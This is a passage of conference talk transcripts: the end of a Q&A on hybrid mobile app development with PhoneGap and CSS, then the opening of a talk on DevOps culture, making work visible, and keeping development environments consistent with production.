application. But on startup, you can say, well, let's just go check and see if we've got any updated JavaScript. Maybe you fixed a bug, and instead of having to submit to the app store, you just ship the JavaScript file up there, and your application automatically says, hey, let me go grab the latest assets and bring that down and use this locally. And now you've just shipped an update to your app and fixed a bug that was plaguing your users without having to wait for Apple to approve it or anything like that. More questions? Sorry, these spotlights are hard to see. Yes? OK, yeah, great question. So the question is, with all the different screen sizes and resolutions and portrait versus landscape and rotation, is that something that's better addressed with platform specific UI or with a hybrid solution using CSS? I very much think CSS, especially with CSS3. Your advantage in building a mobile app is that even the worst mobile browsers are better than IE8. So you get to use CSS3 and media queries and really smart selectors, so you can actually customize your UI to handle all of those different screen resolutions and the rotation between them very, very well by writing CSS. Now, if you don't already have a good, strong, responsive design background, yeah, you're going to have to learn it. But which do you feel like is a more worthwhile investment? Learning how to solve the same screen resolution and UI problems on two or three platforms or learning how to solve it using CSS, which, hey, that also applies to the web where a lot of stuff goes on. So to answer your question, yes, I think that those are very well-addressed in hybrid apps by simply using CSS and JavaScript. One of the frameworks I mentioned earlier, Ionic, it does some really nice stuff on startup, whereby it does platform detection, and it slaps CSS classes onto the body tag of your HTML page that says things like platform dash iOS, platform dash Android. And it even assigns grades to these platforms, like grades A through D, based on the capabilities of the hardware. So you can very, very easily, with just CSS, change the layout of your application for a specific platform, maybe disable animations on a lower grade device that's not going to handle them very well. You can do all of that very, very easily by utilizing a lot of these tools. And it actually brings up another great point in that one of the ways in which you can really get more leverage out of your hybrid app is by also making it a web app. But actually, I think Luke was just talking about this in the keynote, that there's a lot of companies that have both a native app and a mobile web experience, and they end up being complementary. When you build, especially like a phone gap app, you're building a native web app. You're building a mobile web app that happens to run on the device. And if you take a little bit of an intelligent approach to it up front by doing a little bit of detection to figure out, hey, am I running on the device, or am I running in a website? You can present the same UI. I've actually done this before with an app that I shipped to the app store, and we had a mobile web version. It was one code base. And so when the users landed on this mobile version of a website, they got the exact same experience as they did in our app that was on the app store. The only difference being that I had a barcode scanner in this app. Well, I can't do a barcode scanner from the web. So all I did was check to see, hey, am I in phone gap, or am I in the web? If I'm in the web, then whenever they clicked that button that would normally bring up a barcode scanner, it said, well, just type in what you're looking for. And maybe you could do it without typing, like Luke said. You could do something more intelligent. But the point being, now you can not only go to all these multiple platforms, but you can also go to the web. Because as you get into native app development, you're going to find that one of the challenges is, now you're expecting your users to install an app. I work for a company that makes a shopping app. Or we used to make a shopping app. Now we only make a shopping mobile site. Because the idea of getting a customer to walk into a store and download a third party app in order to do some additional shopping was too much of a bridge to cross. But I didn't lose any time, because I built all this in phone gap, and I was able to take that code base that I was already using for mobile web and just ditch the native app side of it and only use it as mobile web. We didn't have to backtrack for months and months and months to recreate this as a mobile website. So it's one more advantage of a hybrid app is that now you already have a mobile website available. Yes, sir? How do you handle offline functionality in the network app? Do you use local storage? That's a great question. So how do you handle offline in, say, a phone gap app? There's a lot of ways. Yes, local storage is my favorite. I typically am using just HTML5 local storage to do a lot of things. There are also plug-ins that you can use, such as CouchBase. If anybody's used CouchBase before, they now have a mobile plug-in that has a sync back-in built into it. So it kind of will automatically do some stuff so that you've got CouchBase on your server. You've got a CouchBase plug-in in your mobile app. And whenever you fire up your mobile app, it kicks off a sync in the background. It starts pulling down background data. And then we'll do the same thing. Whenever you lose a connection, it'll go ahead. And as you continue just interacting with your local app, whenever a connection is available again, sync it back up to the server. And you can also just build your own solutions for this in that there are phone gap, for example, raises events that says network connected, network disconnected. So you can get those events and you can start handling them in your code to say, oh, OK, I need to switch this into offline mode, or I need to switch back into online mode and sync any offline data that happened. So yeah, offline is absolutely something that you can handle very well in a hybrid app, just like you can in a native app. More questions? No? All right, well then, my name is Jeff French. You can follow me on Twitter at Jeff underscore French or check out my blog, geekindulgence.com. And if you have any additional questions that come up after this, feel free to hit me up in one of those two places. Thank you very much for your time today. Thank you.
In today’s mobile-first world almost every company has realized the need to connect with consumers on mobile devices. Now you, the developer, must figure out how to build it! Objective-C, Java, Xamarin, PhoneGap, Appcelerator, Icenium: there are so many ways to build a mobile app today, how do you choose? In this session I will cover the pros and cons of native app development and HTML5 hybrid app development to help you make the right choice based on the needs of YOUR app.
10.5446/50549 (DOI)
Okay, we got it. We got an hour to talk about this. My name is Richard Campbell. That's my Twitter handle Rich Campbell is probably the easiest way to reach me. I try and respond to everyone That's interested in this subject and interested in any subject because I'm interested in a lot of things. I talk Pretty much for a living it appears these days. If you haven't run across me before I'm older than I look my first line of code in 1977 was 10 print quote hello world closed quote was followed by my second line of code 20 go to 10 And that was a TRS 80 model one with 4k of RAM and a cassette tape player for storage a version of basic not built by Microsoft it was a dartmouth basic and it had three error messages. What? how and sorry Which I still think are some of the best error messages ever made because they're honest You know what's object not found but sorry Anyway, I being an old guy and having done a lots of different development a lot of different languages I'm also spent a lot of time in hardware because back then you didn't have a choice So I've always built my own gear and I grew up as networking grew up I I've drilled thick ether and pulled arc net and and so as I became a professional in this industry that doesn't really have professional designations I fell into performance work because I'm comfortable with software I know my way around hardware understand networking and when you try and make stuff go fast all the pieces have to come together and So being able to fit between those bits and understand the different pieces that paid the best You know we work so many hours in a day and so you might as well work on the hours that pay the most and performance work is really really fun And that's how I I sort of ended up in this role for better or worse and I didn't realize at the time but Devops this term you'll hear thrown around Is about making really really good quality software and and I had discovered a number of years ago that every time I had really good software Really fast systems and had a really great team behind it and we've hung a name a new name on that today And that's devops and so that's how I ended up talking about this So day to day my life is I do some architecture consulting work for a variety of firms mostly building large-scale systems I make conferences I go to a lot of conferences so my conference is called dev intersection. We do two a year In the springtime we do one in the east coast typically in Orlando and in the fall we do one in Las Vegas and Pretty similar to Andy seen a lot of respects but Different group of speakers because I talked to a lot of people I make a ton of podcasts any Donnie rocks listeners in the room Awesome, well welcome So these are free to download their audio talk shows Donnie rocks is the original one Carl created it back in 2002 which I always find amazing because the word podcast wasn't invented 2004 he was just putting MP3 files on the internet. I came on as the co-host in 2004 at episode 100 and Today we published episode 991 We'll record 10 shows here this week at NDC with a variety of speakers Except free to download we published three a week Tuesday shows tend to be technical so like next Tuesday show will be Dominic Bayer and Brock Allen talking about So single sign-on with open ID connect Wednesday shows tend to be more mobile and tablet focused so we've got Chris Hardy from Xamarin talking about the latest in Xamarin forms and their cool technology and then the Thursday shows where we have some Fun stuff we think you might want to know more about maybe its history or its your career Sometimes we go way off track and we talk about stuff like alternative energy The show I've currently got planned is Brian Hunter's conversation about building communities around functional program So that's DNR. It's the big show We used to have a show called the tablet show which we've now wrapped up because we've rolled it into dotnet rocks And that was focused on mobile and tablet and run as radio is me exercising the other half of my brain Because I live as much in the IT world as I do in the development world So thanks the whole dev ops thing now we've all heard the term What are we really talking about when we say dev ops and I'm going to talk about the fundamentals here That's why I call it the essence It's about building better software and we've been trying to do that for a long time You know, I read papers from the 60s people complaining about Software problems. It's it's gone on for forever The term dev ops was first used in anger in 2009. It was a guy named John all spa writes a great book on web operations and at the time he was the operations lead for Flickr and And so he did a talk at a conference called velocity in San Jose, California and the velocity conference is all about High-performance websites. That's where the Facebook guys go and the Google guys go if you want to know about high-for-volosity websites That's the velocity show and what John did was a talk called 10 deploys a day So he had gotten Flickr to a point where they were pushing a new version of the Flickr website this photo website that yeah, who owns 10 times a day which is crazy Like that's a lot Just running your build process that fast much less actually making any changes to anything But the conversation that he had was really interesting about the relationship that had to exist between the development folks and the operations folks To be able to push code that quickly and he showed the advantages that were there So then that's the lamp stack, you know, that's not the dotnet world It's a very different way of thinking about software, but it was showing the advantages of Really the 10 times a day was almost a decoy It's a it's a byproduct of when you have teams working together Really well when they really understand and value the differences between them so that they they get that synergistic effect that one plus one equals three or more That's what we're trying to get to is how can we put teams together that work in a level of efficiency That's dramatically better and part of this comes down to this idea of an application lifecycle, which will recall ourselves developers in room everybody a developer Everybody anybody willing to call themselves an operations guy or an IT guy It's you and me man Because I've done, you know, you saw the bio slide. I've been in computing for a long time I've done every job you could think of at one time or another and they're all they're different There's some fun parts to be an IT guy. You get to say no a lot You usually get an office with a door Right now I put a sign on my door that said no any questions because I wanted to establish our relationship before you not The problem with being an IT guy is When you do your job perfectly and I presume you and I are both doing our jobs perfectly Nobody can tell you're invisible because stuff just works. You can get a C. She never get an A and I'd get lonely start turn a server off phone rings every time. Hi miss me We turn that back on for you. How's that now? Right, it's easy to get an F turn a server off But it's you can't get better to see now compare that to the development guy because the development guys Well, we write software we have shipping parties. There are no shipping parties for operations. Nothing crashed today Let's get a beer. That's not a party It's not the same thing But when you create new things it celebrated you can get an A you can get an F2 We've created some pretty crappy things along the way But you can get an A and so there's a tension between the two so when we talk talking about application lifecycle Usually we're thinking in terms of development, but what if we include operations in that as well now? I got to pull up a diagram which we know okay. Let's talk diagram. This one comes from Microsoft Let's not hold that against them or hold that diagram against that Because what I like about this diagram is it does to show two Orbits two cycles and a larger overall cycle so on the left We have this development cycle that we're probably all familiar with where you get requirements You have this thinking time that breaks it down into features you want to build Hopefully build some tests around that and that finally comes together in some code that becomes a build and at some point You throw that build over to operation say hey put this on a server for me, would you and then you go back into your iteration again and the agile movement or the extreme programming movement or the solid movement or the craftsman movement at whatever Approach you're taking to build better software has been focused on that iteration and most of the time We sort of ignore the barrier that we hit at the bottom of this diagram where we get a build and pass it to operations We'll complain about why operation says no and holds slows things down But we don't really understand the cycle on the right side of the screen here because that cycle Like a development cycle goes around where deployment is a big part of our lives as an ops guy and Management keeping systems up and reliable monitoring those are a big part of our job as well and hopefully Hopefully there's some kind of feedback mechanism that we can actually take the information of our experiences in production and push that back and In fact every organization I've ever worked with over the years has that larger cycle It's really just a question of how quickly you get around it and What the quality of the information is that gets out the other end? Because sometimes the only feedback I'm getting for operations is when they pass me in the hall and go wow your software really sucks Or when the CTO phones it says why is the website so slow? I mean that's feedback. It's just no not very precise Not very detailed not very frequent You know, maybe we could go faster on these things We'd get better at it. So if we're going to talk about application life cycles and the whole cycle, let's include Everybody who influences the success of the application? And so devops is not a good enough term because it's not just developer and operations folks the QA folks the infosec folks the domain expertise and The customer they all influence the success of the application Look, we all want to have a party the question is when to have the party, you know step one on devops is don't have a party when you finish writing the code Right and don't even have a party when they deploy it Because that's not everybody, you know everybody the only point where I could actually feel successful about a piece of software is some period of time some weeks after a deployment when I could show that my customers were using it and loving it Then I had a party because at that point everybody in my life cycle had had that experience with the latest version That's something to celebrate But it's hard to find those things and it's hard to get started with this and it's hard to even understand what success is Like what is successful software? This gets into this great debate about what is quality software? Because it's we all it's like one of those things where you think I know it if I see it But how do you actually measure it or come up with a term or a meaning around software that That people can really relate to I like the concept of Observable software because I've had that experience. I'm sure you have to where we understand how the software works because we built it But you put it in the hands of the person who has to use it every day and they're baffled by it You know, I'd go all the way back to writing apps in VB 3 on Windows 3 1 What's that older lady who had been filling in paper forms her entire career? And now in the last few years of her job, we put a PC on her desk And I had recreated her form that she lived by In that window screen so she could type in the information in the fields and at the bottom There was that add to record button And she clicked that button and that would have to take all that data and package it up to send it back to SQL Server 4.2 so it was going to take a while and so I put that little hourglass up to keep it I'm busy now And what what was her reaction to that she'd fill in the form and she got that But there's no button on her piece of paper. So she puts that value push that button and then she asked me now. What's it doing? There was a point where There was no observability as far as she was concerned anymore. She didn't understand what was going on and He had to recognize that was a failure of the software Like you look at modern UIs today. We're doing a lot to make apps more observable Why are screens going from one screen the other way they flip over like a page? It's about giving a sense to the mortals That they know where things have gone and if the page flipped this way, maybe it flips that way as well The way that we hint UIs so that we give visual references I would also say that our users are generally getting more educated I think Facebook is responsible for teaching average mortals that database updates take time Because they always post their update and then they try and see it right away and it's not there So they post it again and we all feel foolish. We see double posts, right? So we're bit by bit Facebook's been educating the right the general population on send an update give a little time all right, but None of what I've said here is that unusual. We've been complaining about software quality for a long time We've had a lot of movements along the way to make software better. You remember? When management first found the word agile and liked it We got to get the guys some agile like it came in a squirt bottle. Just spray this on your developer. It'll go faster I think it's going to happen to dev ops too. It hasn't happened yet, but I think it's coming right like dev ops comes in a squirt bottle I've already seen somebody selling dev ops in a box Like it's a product Like agile was supposed to be a product because you know, it's not right, we call the session people Processed tools for a reason it starts with people it starts with a cultural belief that we can make our software better and then we can apply processes To start putting that place and only after that this tools make sense that we have things we need to use to make this process easier But if without the cultural change nothing else happens and culture doesn't change overnight and you can't change at all But I also think that there are some technical aspects that are making dev ops more visible today And part of this has to do with things like Virtualization if there's any single technology you can sort of lean on and say Why are we talking about this now? Why are we talking about going so fast? Virtualization is a big piece of this because virtualization itself has evolved a long way. I first encountered virtual machines in the late 90s When we were dealing mostly with installation problems. It was a testing tool It was an ability for you to keep images of different machine configurations that you had to live with so you could test if you could Deploy your software successfully to it and when it failed and it often did then you was easy to roll back and try again So it's just a way to iterate on multiple platforms at once and then virtualization evolved. It became faster and leaner they Intel and AMD Implemented some low-level instructions for their processors so that virtualization can be very very thin and it took over the server world How many people here have production servers that are VMs now production servers? It's the most of us You know why because it serves a great purpose for the operations guy Now we have this ability to upgrade hardware without having to rebuild the VM just move it to a new machine When you get really good at it you start seeing this cloud world where where the VM actually lives is irrelevant It can float from machine to machine. It's kind of transparent. You can create more of them And so we've commoditized the infrastructure made it much easier to create new instances of things faster I also believe that the way we build software has evolved in a very positive way the diversification of languages has created an environment where we understand how testing should work and how change management should work So that if you want to iterate faster you can compensate more quickly And without a doubt we're going faster than we used to you know I remember when we felt like rock stars for pushing on a new version of the app every year Alright and then we got that down to six months Now where are we? Three months twelve weeks Faster slower six months Two weeks Oh, two weeks is fast a month You get a build out of the month. I mean that's normal Twelve weeks I've seen lots of folks that are very happy to be iterating at a twelve week rate And I'm working with a customer e-commerce site I do a lot of e-commerce related work I know it well it's about making fast websites we're good at that You know one of the ways we create quality software is turns out if you go really fast and when they click the button it goes on to the next thing right away That's another way of creating observable software because something happens So making stuff go fast was an easy way to solve that problem So but when you're in a twelve week iterative you're going to be able to do a lot of things faster than you are So but when you're in a twelve week iteration and you're feeling pretty good about it because he came from a year The fact that people want to go dramatically faster seems odd right Well that was John also talking about when he wanted to do ten deploys a day What the heck does that actually buy me? And part of what it buys you is an ability to react very quickly to bugs Problems and to fight back from the downward spiral because the downward spiral we've all been in this It's a life-sucker of got to get it out mentality on the app So usually it starts with management of VP because they're bad at this Announces a new version of the product and sets an arbitrary deadline With a set of features that he's announced to customers that they're all very excited about Because every piece of software you haven't shipped yet works great And now with a hard deadline and a hard set of requirements and a fixed budget we have to deliver it So we cut corners because what else are you going to do? You got to get there Just we'll fix it later, build up that technical debt And when it finally gets deployed the ops guys have a really tough weekend Trying to get the thing to actually stand up and keep running for any length of time And when it does finally get up and running it's still crapping out every so often having problems So you have that steady stream of crises that are going on while the new version is running And customers end up not being that happy with it It's not fast enough, it's missing a feature, it keeps crashing I get halfway through filling in the form and it goes away You know that's that battle that happens and as customers start to give up on it and you start losing market share What happens next? VP shows up to save the day with a set of new features that people are really excited about And a hard deadline and a fixed budget, let's go again We've been through this and we know what happens and it's depressing, it's frustrating Because you know you could build better software and when you have those hard weekends When the thing tanks on a Saturday and sales are basically lost Monday morning you have that awesome meeting Senior ops guy that's been up the whole weekend with one of these juniors with him Architect and a lead developer sitting on the other side of the table Maybe a manager shows up, the VP shows up and goes guys we can't have a weekend like we just had I know you can work it out and then he leaves He's got to get his golf, which arguably is not a bad outcome because I don't think I actually want him in the room But what happens with that conversation? Well pretty quickly it degenerates into if your infrastructure was more reliable we wouldn't have these problems Well if your software didn't suck as much as it does, we wouldn't have these problems And eventually we agree we don't have enough information to successfully accuse either So we plan for another meeting the following week And then we leave Then when the 15 minute reminder pops up from Outlook one week later You quickly grab some log files to be used as evidence against the other guys and then do this meeting again It's not a constructive process and it's very hard to build better software, better systems doing it this way So here's the thinking Because I think our industry has changed as well There are no businesses now that don't use software It's just as crazy to have a business that doesn't have a telephone as it is to have a business that doesn't have a website We're getting that way with mobile apps now where the expectation is we have mobile apps that communicate with our customers So that's the best way to do things So software has become the business It didn't used to be like this for a long time if you've been doing development for a while Software was almost a luxury, maybe it was a competitive advantage but we could still do our business without it These days you talk to a customer and they're still thinking about, they're not thinking about software development as a competitive advantage Or they're not thinking about it as a capital expenditure, it's just this expense It's like if I turn these servers off how much work do you guys get done? What does your job look like? Well we can't do anything, we have to go home Probably fairly important to the business then So it really comes down to this, there are no longer any technology problems There are only business problems And that ultimately, businesses aren't anything except people actually So it's a people problem And I've felt like this for a long time now, that there's nothing I couldn't do in software The question was could this team do it? The machines are fast enough, we've got enough hardware Can we do it? Can we actually figure out what we need to get done in a timely manner and be responsive to what the business needs? Because that's what it looks like today So if you're doing businesses out there that get this nailed and there's great quotes coming from some of them One of my favorite ones comes from Adrian Cockroft This do painful things more frequently so you can make them less painful That's Cockroft, the architect at Netflix We all know Netflix, right? These guys used to rent DVDs by mail And a little red envelope, that was their business You remember DVDs? And they were smart enough to figure out we really should do some internet things And so they moved their business over to streaming internet and they did it on the cloud At peak times, which is evenings in the US Netflix is like 25% of all the traffic traveling over the internet in the US In the evenings, that's more than porn How do you think they load test their system? Because there's not enough internet to go around This is a pretty tricky problem, I'm not saying we all have the problems that Netflix has But you've got to think, here's a high watermark Here's a group of guys who are building software that really tough to test That has to be reliable, they make no money if you can't watch your movie And heck, even if you can't watch your movie, if it's a little jumpy, it's not good enough I'd rather have my DVD So they battle some pretty tricky problems And they've come up with an interesting team, it's very responsive Cockroach also talked about, when we started calling the developers at 3 o'clock in the morning for an outage Had a lot fewer outages, you know, he's tackled a lot of these problems They also built a set of tools called Chaos Monkey Anybody know, heard the Simeon army, it's on GitHub, you can download it What they finally realized is the only way for them to make more reliable systems was to create a piece of software And Chaos Monkey, you don't choose Chaos Monkey, Chaos Monkey queues you This is a piece of software that kills servers inside of Netflix at random 24 hours a day It's the only way for them to know, right? If they can actually, Chaos Monkey can actually kill a system, that's a bug And Chaos Monkey doesn't succeed And Netflix got so good at this that when Amazon had a major outage And the Amazon website was down, they weren't out Netflix was still running, they're more reliable than their service provider now That's pretty impressive But it speaks to how good software can be So if we're really going to get into this, if we're really, you know, we all recognize that we all live and die together That we're responsible for the success of the business Is that's where software is at right now? We've got to do something, we have to think a different way So now I'm going to believe you're on board, I agree, I'm here, let's do this, how do we get started? Now I'm going to talk about a guy named Gene Kim, who's one of the godfathers of DevOps And he talks about the three ways So let's work through the three ways The hardest one is the first way So the first way is systems thinking So the challenge now is, I need to understand the work How do we really build software, how does software actually get built in my organization? And this is powerful stuff because it only takes one or two people to do it You can't change a culture overnight, it doesn't work that way You can't just say, today we're going to do DevOps, things are going to be better We have to start incrementally, and part of it is just understanding what's going on If we want to understand the flow of work, it'll naturally improve itself It's a funny thing that happens when you look at stuff, it gets better Because most of the time we don't look at things, I've spent a lot of my career as a consultant The fun part about being a consultant is you don't know anything about the organization And about what they actually do And so you tend to walk around the room asking people what they do and how things go on And every so often you find that white elephant You're like, you guys know this is an elephant, right? We don't talk about the elephant So a long time ago, the 80s, I was a master at high performance printers Back when that mattered, right? So this is company, because sometimes you need really, really fast printers And fast printers are expensive, so getting the right printer was a big deal So I was well known in Vancouver as a guy who, I could get you the right printer I knew all the sources, we'd get a reasonable price for it But you had to actually, you're spending 50 grand on a printer You better get the right printer So this was a company that they were doing a GL dump So I get a call, hey we're doing this GL dump and it's taking three days now They were printing their entire monthly GL out Remember the ledger paper, the white stuff with the different colored bands With the green, white bands on it, tractor feed So it's like, well it's taking us three days to print it out The boss says that's taken too long, we need to get under a day, can you get us a printer? I definitely need a printer, why the hell do you print your GL out? So I go and visit the company and we're looking at it And they got a nice printer already and the GL is this much paper, it's huge The thing weighs 30 pounds What do you do with the GL? It's required to be printed out every month, for what? It's just required, we have to do it, the boss wants it I couldn't get an explanation So I thought, you know what, I'm just going to follow Before we get a new printer, let me just follow this GL, let's print one out So a month then came, we ran this thing and it took three days And when it was finished, it was this huge stack of paper and this nice lady picked up the stack of paper So I followed the stack of paper And she went to the CFO's office and she put this gigantic stack of paper in the inbox And then she left, so I sat with the paper Eventually the CFO came in, saw me And then he went, oh, the GL's here And he picked up this big pile of paper And he put it down on his desk and he flipped it over And he tore the bottom page off with all the totals on it And he started reading it And he says, is that the only part of the GL you use? He goes, yeah, he says, if I could print out just that page, would that be useful here? And he said, you can do that? Just following the workflow, you know? Because we have this problem, people talk to me about all the time Where they feel like they're a cog in the machine of the development process inside their organization They figured out you're a UI person, so you're the UI guy And you're going to get requirements in from the architect And you're going to build your UI piece And you're going to pass it along to the services guy so that he can build his piece And that's all you have to worry about You know, you're a gear, and there's a gear here and a gear there And just make sure you know about your gears, thanks for playing And it's very hard to get better, we don't like that I want to do other things, I want to grow more I want to experience other ways to build software I want to try new technologies, I don't want to be a cog Part of not being a cog is actually understanding the whole flow of work Where does the work go? So, how do we look at the whole system? And the side effect of having different pairs of eyes understanding the whole system Is you start finding other ways to fix things, that things can be better So how do you get started with this? It starts with that cultural requirement I want us to get better, and I think I can get better by understanding the flow of work So now we want a process in place A process of starting to understand the whole flow of work And so, Kim talks about this first and foremost About understanding what work is inside of our organization Alright, so I want to get better I want to understand the whole flow of work to make things better So we're going to start defining work Now we can talk about a tool And all I want to do is define work So I could do this pen and paper In fact, the most effective way I've ever done this in an organization Was I got a big whiteboard and we stuck post-it notes to it I've reached out and I just wanted us to write on the whiteboard But that was too inconvenient, and I'll talk to you about why I wanted to get everybody, both operations and development To write down what they were doing every day Not to measure it, not to change it, just to know what it was And most folks couldn't get to the whiteboard off enough So we ended up using post-it notes Now, this breaks down quickly into four classes of work The top two are easy ones Business projects Why are business projects easy? Everybody knows what they are I could talk to almost anybody inside of that overall IT organization What are the major business projects going on right now And most people can list them off, whether they work on them or not Why? Because managers are involved And since managers don't do real work, they have to make noise Actually, that's unfair They have budget As soon as you have a budget, you have to explain what you're doing Which means you need to have a story, so you talk about it So people know about it Major projects have project plans They have a budget assigned to them, they have deadlines They have goals around them, and you bang the drum about it It's important And that's also true of most internal IT projects Maybe not as often, basically no business project is known about People talk about this all the time Internal IT projects, new source control system, new testing infrastructure Clustering the databases for reliability All internal projects for ultimately making the system better Often have budget associated with them as well So they tend to be known, but not always Clustering the databases is a great technology It actually makes the database more reliable But if you don't tell anybody If the ops guys do it and don't tell the dev guys You'll find that it doesn't help you at all So it turns out you actually have to write software To make cluster database help you It's true So actually making that visible is kind of useful to the organization Where this gets interesting, we get to the last two items The changes and the unplanned work And this is where I found out we really needed post-it notes Especially for ops guys Dev guys too, because you get calls You're in the middle of writing the code for the new thing And they call you and say, hey, I really need you to fix XYZ Right now, just stop what you're doing, fix it now And so you change, you do that great context shift I mean, it's a terrible thing about development, right? As a developer, I learned pretty quickly that my productivity Was measured in interruptions per hour And the correct number of interruptions per hour for me was 0.25 Because if I really want to write a chunk of code, it takes me about four hours You know, when you first get to work and you're going to write some code It takes you about an hour to get going I call it picking up the threads, sort of sit down, look at the requirements set And think, what the hell were they thinking? And then you look at the code you've written so far and go, what the hell was I thinking? But then you remember, you sort of get back in the groove And you know, that's 45 minutes an hour, so now you start to write some code Write a little, I run a little, write a little, I run a little Stuff starts, you know, that magic time We're actually creating, building something new Organizing electrons for fun and profit And then about three hours in, it's working, something good I'm ready to check this in, but I haven't followed any of the coding requirements So I have to clean it up And that takes about an hour as well, right? While you follow the documentation requirements Maybe you factor a couple of things, check in You get interrupted anywhere along that flow You almost have to start over, right? You pick the threads back up again and try and go again That's why I found myself, like, working during the day was just a mistake Because people keep interrupting me, I had a sign that said, interruptions per hour And when people would knock on the door, a phone ring, I'd come in, I'd change the number And then say, yes Because you're interrupted, it's over, right? You might as well make your point That's how I started coming in at noon Then I'd go to lunch Then I'd come back and it's meetings all afternoon, because there's always meetings all afternoon And somewhere around six o'clock when the noisy people go away I start to write code, and I'll probably have a pretty good check in about ten Then I go home, and I come in at about noon And as a manager, I got really keen on, don't let, don't interrupt these guys Like, interruptions really, really matter here So as I started monitoring changes, I started asking folks, what changes are you making Both the development side and the operations side, there's a lot of changes that go on So I was giving people stacks of post-it notes, yellow ones for changes And then I had red ones for untimely work for actual crises The drop everything, the sites down, fix this right now, that's the highest priority People get addicted to crises, because you don't have to think anymore You don't have to actually make a plan, it's the biggest, the room is on fire, that's priority Pretty sure we're going to focus on that They get kind of nervous when there's no crisis anymore, because now I have to think about what to do next I'm on fire, I know what to do And you get really freaky changes too So I'm working at this organization, we're doing an architectural review for a new version to ship out And the whole system goes down in the middle of the architectural review We haven't changed anything, but we're sitting with the guys going through design Figuring out what we're going to do, it's like, hey, the site's down, how'd they know? Somebody phoned, right? And the first thing they do is all open up the web page and try and hit the site It's like, hey, it's really down, how about that? Like they were hoping the guy was lying Maybe the site would just come up for them And so I was happy to be there, I'm a pretty good guy in a crisis And rule number one is don't change things, don't actually make the problem worse Let's start with what's happened, let's go get some logs, where are we at? We're starting making a plan, about 10 minutes into the site outage Guys, he's not a senior tech guy, but he's been there a long time Got a ton of domain knowledge, nobody's really sure what he does But he sort of wanders out from the back room, says, hey, how's things going? And he's like, oh, the system went down, oh really, how long has it been on? About 10 minutes, goes back into his room, hey, everything comes back up again I'm like, excuse me for a minute, lock over to his desk, sit down So what'd you do? Perfectly ordinary change requests come in all the time, right? Not happy with this query performance, can you change this index around? And he rebuilt that index and it created a locking constraint, took the whole system out And so he dropped that index system all came back up again, he was going to clean up the mess Didn't really do it, and stuff he's done every day So I was like, don't change your work, I prefer you didn't crash the site, but can you just write that down? And so these guys would come out of the back room twice a day and just cover the board with post-it notes Of all the stuff that they'd been asked to do And after a week, we had this huge whiteboard covered in post-it notes The row of notes for the business projects about this big For the internal projects, maybe a little bit bigger Changes, and then a big chunk of unplanned work depending on how healthy your system actually is So a few things came from having that board First is, my dev guys had a sense of how much stuff the ops guys do every day You know, what's on that board really when you look at it that way? Technical debt, that's what you're looking at, it's a visualization of technical debt Every shortcut we've ever taken, every I'll fix it later, every time they didn't bother to script the deployment Or document the web config file, ops is just as guilty as dev and some of this stuff It turns up in these post-it notes now And so the other thing that happened was the dev guys look at it and go, wow, you've had to restart that server 15 times this week I could write you a script that would reboot it for you automatically, or we could find out why the heck it keeps crashing But either way, as soon as different eyes were on these kinds of problems, bunches of them go away They were fixable, then the manager comes in and we're like, you want to know why it takes so long to ship a feature? It's this stuff, it's technical debt So now we can actually define a feature cycle, I can get rid of all of these if we can get two devs for one cycle to fix this stuff These then go away, you start to be able to quantify things, because you can see them That's the biggest problem we've got when it comes to defining work and making it visible is most work's invisible You know, your board never started out this way, this is years of effort to have that many changes going on in a given day You've got to really work at it, it's not easy to do So it was the time it took to actually mature the process, mature development, to see this Once we had that visibility and we started grouping these and saying, how do we fix some of these and make them go away? There were certain fundamental things we knew we needed, it just became absolutely apparent One of them was environment creation So here's the thinking, we know that ultimately the most important environment in our business is the production environment The production environment is where we actually make money, and that production environment is virtualized and it has a particular configuration And there's a whole class of problems we're having because our dev environment and our QA environment don't match production They don't have to be exactly the same, but they have to be configured the same, and virtualization makes that way easier Because now we start building templates for the configuration environment for production and we can trickle them down to everybody else So there's one common environment for everyone What does that mean? An example would be SessionState in ASP.NET By default, when you stand up a new copy of Studio and you run a local version of ASP.NET, you go to in process session You can code against that all day, but you got out of process session in production Which means when you go to deploy, if you've done anything silly to your SessionState, which is easy to do, you're going to be hit by it It's just a problem waiting to happen So what if we make sure those configurations match? And the easiest way to do that is to have the environment managed by production And a bunch of things come out of that. One is it's absolutely consistent, so a whole class of bugs go away The second is when you need to change the environment as a developer, which you will, you have a conversation with production before you make the changes You're going to have the conversation one way or the other You make changes, you go to deploy, and it breaks, there's going to be a conversation It'll be an unpleasant one, but it'll happen But what if we had the conversation first and we get people actually thinking about the consequences of those changes Because they have to implement them, they change the template, push it back to you Well that's interesting, because now we see it coming, we can test it in advance, we know more about it, we can move faster Same with common build process as a whole, one button click for build, right? It's absolutely given, when you talk about things that you come out of the first way, the things that come out of the first way are One source of the truth, code, configuration, the environment, they're all in one place, they're absolutely consistent Build process is one click, it needs to be one click, it needs to be so easy, you could do it by accident Oh darn it, you did a build, right? If you're still in the world where there's one guy that knows how to do the build because he's the only one that knows when to sacrifice the chicken That's tough, what happens if that guy goes on vacation? I had one of those back room guys, went on vacation and we couldn't do a build, the whole time was on vacation I didn't put the two together, nobody knew he went on vacation, it's just all of a sudden the build process was failing Turned out we had a security limitation that didn't allow us to deploy certain files And this guy would see it come up as an operations manager error and he'd just fix it every time we did a build And he never told anybody, and it wasn't until nobody could do a build for two weeks and then he came back and the first day he was back The build worked and I'm like what changed? And then you ask him, he goes oh I see these errors all the time, the easy way to do is fix it that way Okay, how about we make it so those errors don't happen anymore? Visibility, there's lots of these things that go on Big challenge with getting one source of truth, is your database in there too? Getting the DBAs on board, do you think Ops is grumpy? Try DBAs, I've been a DBA, it's a hard job, because you guys keep changing things And all the customers end up being named John Smith, who gets blamed? The biggest problem when you're a DBA, especially if you've done it for a while, is that you have this belief that you own scripts That the value you bring to the organization is change scripts The ability to change the database from whatever version is now to the version it needs to be for whatever you guys want to do next And it's not true, you need to own the schema, change scripts are easy to make, there are tools that will do it for you The schema needs to be treated like source, the data has to be protected so the tools need to protect the data, that's inevitable But getting DBAs to change their minds about what's valuable, very time consuming, it's hard to do When I find folks that don't want to change, when they fear change, when the conversations are so broken down, they're so negative, you can't go anywhere I know there's scars, there's scar tissue there, you're really thinking about this going, there's no way I could talk to the Ops guys They won't even answer the phone, it all depends on the level of communication we have, and there's a progression there I am the lowest quality version of communication you can do Arguably Twitter is the same caliber, it's just it's also in public So if you're texting with someone, you go more in three iterations, change the medium, move up, try an email But email can develop pretty quickly, my rule is if the number of paragraphs for the responding email is longer than the previous one, you're failing Email should get shorter as the conversation progresses, the perfect email is an email that says OK, then you know the conversation is finished But if I write three paragraphs about a problem and you come back with 12 paragraphs as a response and I write 48 as the response, not a constructive outcome Change the medium, phone call Phone call doesn't work, meeting, meeting 